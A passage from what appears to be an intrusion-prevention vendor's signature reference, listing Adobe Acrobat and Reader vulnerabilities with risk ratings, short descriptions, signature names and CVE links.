https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16397
Back to top

Adobe-Acrobat-Imageconversion-EMF-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Buffer Overflow
Description: Improper parsing of EMF files causes a heap buffer overflow in Adobe Acrobat. A successful exploit can allow an attacker to run arbitrary code on the target system.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-Heap-Based-Buffer-Overflow
References:
CVE-2017-16404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16404
Back to top

Adobe-Acrobat-Imageconversion-EMF-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Integer Overflow
Description: Improper parsing of EMF+ records in an EMF file causes an integer overflow vulnerability in Adobe Acrobat. A successful attack allows arbitrary code to be executed on the target system.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-Integer-Overflow
References:
CVE-2017-11308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11308
Back to top

Adobe-Acrobat-Imageconversion-EMF-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-991-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Integer Overflow
Description: A vulnerability caused by improper parsing of EMF files in Adobe Systems Acrobat 2017 can cause an integer overflow.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-Parsing-Integer-Overflow
References:
CVE-2017-11227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11227
Back to top

Adobe-Acrobat-Imageconversion-EMF-Parsing-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper handling of EMF files causes an out of bounds read vulnerability in Adobe Acrobat. Successful exploitation of the vulnerability allows a remote attacker to leak information from the target system.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-EMF-Parsing-Out-Of-Bounds-Read
References:
CVE-2017-11249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11249
Back to top

Adobe-Acrobat-Imageconversion-Emfplus-Heap-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1052-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Buffer Overflow
Description: Improper parsing of EMF+ records causes a heap-based buffer overflow in Adobe Acrobat. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-Emfplus-Heap-Based-Buffer-Overflow
References:
CVE-2018-4895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4895
Back to top

Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Information-Disclosure

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1110-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Integer Overflow
Description: Improper parsing of a EmfPlusDrawBeziers records in EMF files causes a vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to be able to disclose information on the target system.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Information-Disclosure
References:
CVE-2018-15946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15946
Back to top

Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper parsing of EMF+ records in an EMF file causes an out of Bounds read vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to execute code on the target system.
Situation: File-Binary_Adobe-Acrobat-Imageconversion-Emfplusdrawbeziers-Out-Of-Bounds-Read
References:
CVE-2018-5061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5061
Back to top

Adobe-Acrobat-Imageconversion-JPEG-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat DC (Classic)
Risk: Moderate
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Buffer Overflow
Description: Improper handling of color profile data in JPEG files causes a heap buffer overflow, which can be exploited to gain user-level code execution ability on the target system.
Situation: File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Heap-Buffer-Overflow
References:
CVE-2017-2959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2959
Back to top

Adobe-Acrobat-Imageconversion-JPEG-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat DC (Classic)
Risk: Moderate
First detected in: sgpkg-ips-857-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper validation of JPEG files results in an out-of-bounds read vulnerability in Adobe Acrobat. A successful exploit can allow an attacker to extract information from the target system.
Situation: File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Out-Of-Bounds-Read
References:
CVE-2017-2960
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2960
Back to top

Adobe-Acrobat-Imageconversion-JPEG-Parsing-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat DC (Classic)
Risk: Moderate
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper parsing of an APP2 tag of a JPEG image causes an out-of-bounds read vulnerability in Adobe Acrobat. A successful exploit allows an attacker to gain information that is useful for further exploitation of the system.
Situation: File-JPEG_Adobe-Acrobat-Imageconversion-JPEG-Parsing-Out-Of-Bounds-Read
References:
CVE-2018-12855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12855
Back to top

Adobe-Acrobat-JavaScript-GetAnnots-Memory-Corruption

About this vulnerability: A buffer overflow vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: A memory corruption vulnerability exists in Adobe Reader and Acrobat. The vulnerability is due to insufficient input validation in the implementation of the getAnnots JavaScript method. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious PDF file. In an attack case where code injection is not successful, the affected Acrobat application parsing the malicious PDF document can terminate abnormally. In a more sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user.
Situation: HTTP_SS-Adobe-Acrobat-GetAnnots-Memory-Corruption
File-PDF_Adobe-Acrobat-GetAnnots-Memory-Corruption
References:
BID-34736
http://www.securityfocus.com/bid/34736
Back to top

Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Adobe Systems Acrobat Professional
Risk: High
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Adobe Acrobat and Reader. The vulnerability is due to insufficient input validation in the getIcon() method of a Collab object while processing a crafted PDF file. A remote attacker can exploit this vulnerability by enticing the target user to open malicious PDF files. A successful attack may lead to code execution in the context of the current user.
Situation: HTTP_SS-Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow
File-PDF_Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow
References:
CVE-2009-0927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927
BID-34169
http://www.securityfocus.com/bid/34169
Back to top

Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: There has been reported an out of bounds read vulnerability in Adobe Acrobat. Successful exploitation could lead in information disclosure.
Situation: HTTP_SHS-Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read
References:
CVE-2019-7110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7110
Back to top

Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read-CVE-2019-7109

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: There exists an out of bounds read vulnerability in Adobe Acrobat. Opening the maliciously crafted file is required to exploit the vulnerability. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read-CVE-2019-7109
References:
CVE-2019-7109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7109
Back to top

Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1192-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: There exists an out of bounds write vulnerability in Adobe Acrobat. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Write
References:
CVE-2019-7111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7111
Back to top

Adobe-Acrobat-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4990

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper handling of embedded JPEG2000 files in PDFs causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may allow remote code execution.
Situation: File-PDF_Adobe-Acrobat-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4990
References:
CVE-2018-4990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4990
Back to top

Adobe-Acrobat-JPXDecode-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Adobe Acrobat
Risk: High
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: There is a memory corruption vulnerability in the Adobe Acrobat and Acrobat Reader products. The vulnerability is due to an error when processing the RGN marker segment of a JPXDecode encoded data stream. Remote attackers can exploit this vulnerability by enticing affected users to open a malicious PDF document in a vulnerable version of the product, allowing code execution in the context of the current user.
Situation: HTTP_SS-Adobe-Acrobat-JPXDecode-Memory-Corruption
File-PDF_Adobe-Acrobat-JPXDecode-Memory-Corruption
References:
CVE-2009-3955
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3955
BID-37757
http://www.securityfocus.com/bid/37757
Back to top

Adobe-Acrobat-Media-Newplayer-Code-Execution

About this vulnerability: A vulnerability in Adobe Acrobat
Risk: High
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: There is a code execution vulnerability in Adobe Reader and Acrobat products. The vulnerability is caused by a use-after-free error when parsing crafted JavaScript calls to the media.newPlayer function. A remote attacker can exploit this vulnerability by enticing a user to download and view a malicious PDF file in a vulnerable version of the affected product.
Situation: HTTP_SS-Adobe-Acrobat-Media-Newplayer-Code-Execution
File-PDF_Adobe-Acrobat-Media-Newplayer-Code-Execution
References:
CVE-2009-4324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4324
BID-37331
http://www.securityfocus.com/bid/37331
OSVDB-60980
http://www.osvdb.org/60980
Back to top

Adobe-Acrobat-Ocg-Setintent-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Integer Overflow
Description: Improper validation of scripts in a PDF file causes an integer overflow vulnerability in Adobe Acrobat, which can be exploited to run arbitrary code on the target system.
Situation: File-PDF_Adobe-Acrobat-Ocg-Setintent-Integer-Overflow
References:
CVE-2018-4910
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4910
Back to top

Adobe-Acrobat-PDF-Font-Processing-Memory-Corruption

About this vulnerability: A buffer overflow vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-210-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Buffer Overflow
Description: A memory corruption vulnerability exists in Adobe Reader and Acrobat products. The vulnerability is due to improper data validation when parsing crafted font data in PDF documents. Remote attackers could exploit this vulnerability by persuading the target users to open a malicious PDF document and execute arbitrary code. In a more sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged in user. If the attack does not result in code execution, the affected application may terminate due to memory corruption.
Situation: HTTP_SS-Adobe-Acrobat-Font-Processing-Memory-Corruption
File-PDF_Adobe-Acrobat-Font-Processing-Memory-Corruption
References:
CVE-2008-4813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4813
BID-32100
http://www.securityfocus.com/bid/32100
Back to top

Adobe-Acrobat-Pro-Dc-Acroform-setFocus-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat DC (Classic)
Risk: High
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: A use-after-free vulnerability has been reported in AcroForm.api, a component of Adobe Acrobat and Acrobat Reader. This vulnerability is due to improper validation of objects when processing forms. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted web page or document. Successful exploitation of this vulnerabilities could lead to arbitrary code execution under the security context of the user.
Situation: File-PDF_Adobe-Acrobat-Pro-Dc-Acroform-setFocus-Use-After-Free
References:
CVE-2019-8033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8033
Back to top

Adobe-Acrobat-Pro-Dc-Fdf-Object-Use-After-Free

About this vulnerability: A vulnerability in Adobe System Acrobat Pro DC
Risk: Moderate
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Platform: Generic
Software: Adobe Acrobat Pro
Type: Malfunction
Description: There exists a use after free vulnerability in Adobe Acrobat Pro. Successful exploitation could lead in arbitrary code execution.
Situation: File-PDF_Adobe-Acrobat-Pro-Dc-Fdf-Object-Use-After-Free
References:
CVE-2020-24430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24430
Back to top

Adobe-Acrobat-Pro-Dc-JavaScript-Submitform-Url-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat Pro DC
Risk: Moderate
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Platform: Generic
Software: Adobe Acrobat Pro
Type: Malfunction
Description: An out-of-bounds read vulnerability has been reported in IA32.api, a component of Adobe Acrobat Pro DC. This vulnerability is due to a type confusion in WebPDF.api whereby a Unicode string is created as an ANSI string from a source Unicode string. The type confusion leads to the creation of an invalid Unicode string. An out of bounds read occurs when a Unicode string manipulation routine traverses the invalid Unicode string. A remote attacker could exploit the vulnerability by enticing an unsuspecting user to open a maliciously crafted PDF document. Successful exploitation would result in denial of service or information disclosure which may be leveraged to achieve remote code execution in the security context of the logged in user.
Situation: File-PDF_Adobe-Acrobat-Pro-Dc-JavaScript-Submitform-Url-Out-Of-Bounds-Read
References:
CVE-2020-24435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24435
Back to top

Adobe-Acrobat-Pro-Heap-Buffer-Overflow-CVE-2014-0529

About this vulnerability: A vulnerability in Adobe Acrobat
Risk: Moderate
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Acrobat
Type: Malfunction
Description: A vulnerability in Adobe Acrobat
Situation: File-Binary_Adobe-Acrobat-Pro-Heap-Buffer-Overflow-CVE-2014-0529
References:
CVE-2014-0529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0529
BID-67362
http://www.securityfocus.com/bid/67362
Back to top

Adobe-Acrobat-Pro-Information-Disclosure-CVE-2015-3058

About this vulnerability: A vulnerability in Adobe Acrobat Pro
Risk: Moderate
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat Pro
Type: Malfunction
Description: An information disclosure vulnerability exists in Adobe Acrobat Pro.
Situation: File-PDF_Adobe-Acrobat-Pro-Information-Disclosure-CVE-2015-3058
References:
CVE-2015-3058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3058
Back to top

Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3053

About this vulnerability: A vulnerability in Adobe Acrobat Pro
Risk: Moderate
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat Pro
Type: Malfunction
Description: A use-after-free vulnerability exists in Adobe Acrobat Pro.
Situation: File-PDF_Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3053
References:
CVE-2015-3053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3053
Back to top

Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3054

About this vulnerability: A vulnerability in Adobe Acrobat Pro
Risk: Moderate
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat Pro
Type: Malfunction
Description: A use-after-free vulnerability exists in Adobe Acrobat Pro.
Situation: File-PDF_Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3054
References:
CVE-2015-3054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3054
Back to top

Adobe-Acrobat-Reader-Adobepdf-ActiveX-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat Reader
Risk: High
First detected in: sgpkg-ips-592-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: A memory corruption vulnerability exists in Adobe Acrobat Reader's ActiveX plugin. The vulnerability is due to a use-after-free vulnerability while handling the messageHandler property. A remote attacker can exploit this vulnerability by enticing a user to visit a maliciously crafted web page. This can result in code execution in the context of the affected user.
Situation: File-Text_Adobe-Acrobat-Reader-Adobepdf-ActiveX-Use-After-Free
References:
CVE-2014-0527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0527
BID-67367
http://www.securityfocus.com/bid/67367
OSVDB-106911
http://www.osvdb.org/106911
Back to top

Adobe-Acrobat-Reader-Dc-Annots-File-Id-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat Reader DC
Risk: Moderate
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Platform: Generic
Software: Adobe Acrobat
Type: Input Validation
Description: There exists an out-of-bounds read vulnerability in Adobe Acrobat Reader DC. Successful exploitation could lead in information disclosure and remote code execution.
Situation: File-PDF_Adobe-Acrobat-Reader-Dc-Annots-File-Id-Out-Of-Bounds-Read
References:
CVE-2021-21042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21042
Back to top

Adobe-Acrobat-Reader-Dc-Annots.api-Setprops-Use-After-Free

About this vulnerability: A vulnerability in Adobe Acrobat Reader DC
Risk: Moderate
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: A use after free vulnerability has been reported in Annots.api, a component of Adobe Acrobat Reader DC. This vulnerability is due to an unchecked side-effect of handling events in the Annotations setProps method. An annotation object can be destroyed and subsequently re-accessed while setting its type property leading to use-after-free conditions. A remote attacker could exploit this vulnerability by enticing an unsuspecting user to open a maliciously crafted PDF document. Successful exploitation would result in arbitrary code execution in the security context of the logged in user.
Situation: File-PDF_Adobe-Acrobat-Reader-Dc-Annots.api-Setprops-Use-After-Free
References:
CVE-2021-28550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28550
Back to top

Adobe-Acrobat-Reader-Dc-Escript.api-Thermometer-Object-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat Reader
Risk: High
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: A use after free vulnerability has been reported in EScript.api, a component of Adobe Acrobat Reader DC. The vulnerability is due to improper handling of Thermometer objects in memory. A remote attacker could exploit this vulnerability by enticing a target user into opening a maliciously crafted PDF document. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: File-PDF_Adobe-Acrobat-Reader-Dc-Escript.api-Thermometer-Object-Use-After-Free
References:
CVE-2021-28640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28640
Back to top

Adobe-Acrobat-Reader-Dc-Jpeg2000-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Systems Acrobat
Risk: High
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1353-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: An heap buffer overflow has been reported in Adobe Acrobat Reader DC. The vulnerability occurs while parsing embedded JPEG2000 stream in PDF files. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PDF file. Successful exploitation could result in execution of arbitrary code under the security context of the target user.
Situation: File-PDF_Adobe-Acrobat-Reader-Dc-Jpeg2000-Heap-Buffer-Overflow
References:
CVE-2021-28560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28560
Back to top

Adobe-Acrobat-Reader-Dc-Path-Join-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Acrobat
Risk: High
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: An out of bounds read vulnerability has been reported in Adobe Acrobat Reader DC. The vulnerability is due to improper handling of relative paths in calls to the app.openDoc JavaScript function. A remote attacker could exploit this vulnerability by enticing a target user into opening a maliciously crafted PDF document. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: File-PDF_Adobe-Acrobat-Reader-Dc-Path-Join-Out-Of-Bounds-Read
References:
CVE-2021-28554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28554
Back to top

Adobe-Acrobat-Reader-Dc-Window-Procedure-wm_setFocus-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: A use after free vulnerability has been reported in AcroRd32.dll a component of Adobe Acrobat Reader DC. The vulnerability is due to incorrect handling of AVWinTextEditControl objects in memory when processing the WM_SETFOCUS message. A remote attacker can exploit this vulnerability be enticing an unsuspecting user to open and interact with a crafted PDF document. Successful exploitation could result in arbitrary code execution in the context of the AcroRd32.exe process.
Situation: File-PDF_Adobe-Acrobat-Reader-Dc-Window-Procedure-wm_setFocus-Use-After-Free
References:
CVE-2021-28639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28639
Back to top

Adobe-Acrobat-Reader-Esobject-Use-After-Free

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2015
Risk: High
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat; Adobe Reader
Type: Malfunction
Description: A use after free vulnerability has been reported in the Adobe Acrobat and Acrobat Reader. This vulnerability is due to incorrect handling of ESObject data objects. A remote attacker could exploit this vulnerability by enticing a user to open a maliciously crafted web page or document. Successful exploitation of this vulnerability could lead to arbitrary code execution under the security context of the user.
Situation: File-PDF_Adobe-Acrobat-Reader-Esobject-Use-After-Free
References:
CVE-2020-9715
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9715
Back to top

Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2946

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2946
References:
CVE-2017-2946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2946
Back to top

Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2949

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a buffer overflow vulnerability in the XSLT component of Adobe Reader and Adobe Acrobat. A remote attacker can use this to execute code on the affected system.
Situation: File-PDF_Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2949
References:
CVE-2017-2949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2949
Back to top

Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Acrobat and Reader
Risk: High
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Acrobat; Adobe Reader
Type: Integer Overflow
Description: There is a code execution vulnerability in Adobe Acrobat and Reader products. The vulnerability is due to an integer overflow error in ACE.dll while parsing the mluc structure within ICC streams. As a result of the integer overflow, a smaller heap buffer is allocated which is subsequently overflowed. Remote attackers can exploit this vulnerability by enticing target users to open a crafted PDF file, and may possibly execute arbitrary code on the target system in the context of the current user.
Situation: HTTP_SS-Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow
File-PDF_Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow
References:
CVE-2010-3622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3622
BID-43729
http://www.securityfocus.com/bid/43729
Back to top

Adobe-Acrobat-Reader-JBIG2-CVE-2013-3352

About this vulnerability: An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader detected
Risk: Moderate
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adobe Reader
Type: Malfunction
Description: An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader detected
Situation: File-PDF_Adobe-Acrobat-Reader-JBIG2-CVE-2013-3352
References:
CVE-2013-3352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3352
Back to top

Adobe-Acrobat-Reader-Jpeg2000-CVE-2016-6941-Information-Disclosure

About this vulnerability: A vulnerability in Adobe Systems Acrobat DC (Classic)
Risk: Moderate
First detected in: sgpkg-ips-825-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: There exists an out-of-bounds read vulnerability in Adobe Acrobat and Reader. A remote attacker can use this to access sensitive data.
Situation: File-PDF_Adobe-Acrobat-Reader-Jpeg2000-CVE-2016-6941-Information-Disclosure
References:
CVE-2016-6941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6941
Back to top

Adobe-Acrobat-Reader-Jpeg2000-Information-Disclosure

About this vulnerability: A vulnerability in Adobe Systems Acrobat DC (Classic)
Risk: Moderate
First detected in: sgpkg-ips-821-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper validation of the ihdr box in an embedded JPEG2000 image causes an information disclosure vulnerability in Adobe Acrobat and Acrobat Reader. A successful attack allows an attacker to extract sensitive information from the target system.
Situation: File-PDF_Adobe-Acrobat-Reader-Jpeg2000-Information-Disclosure
References:
CVE-2016-1078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1078
Back to top

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6942

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Reader
Type: Malfunction
Description: There exists a vulnerability in Adobe Acrobat Reader.
Situation: File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6942
References:
CVE-2016-6942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6942
Back to top

Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6970

About this vulnerability: A vulnerability in Adobe Acrobat Reader
Risk: Moderate
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
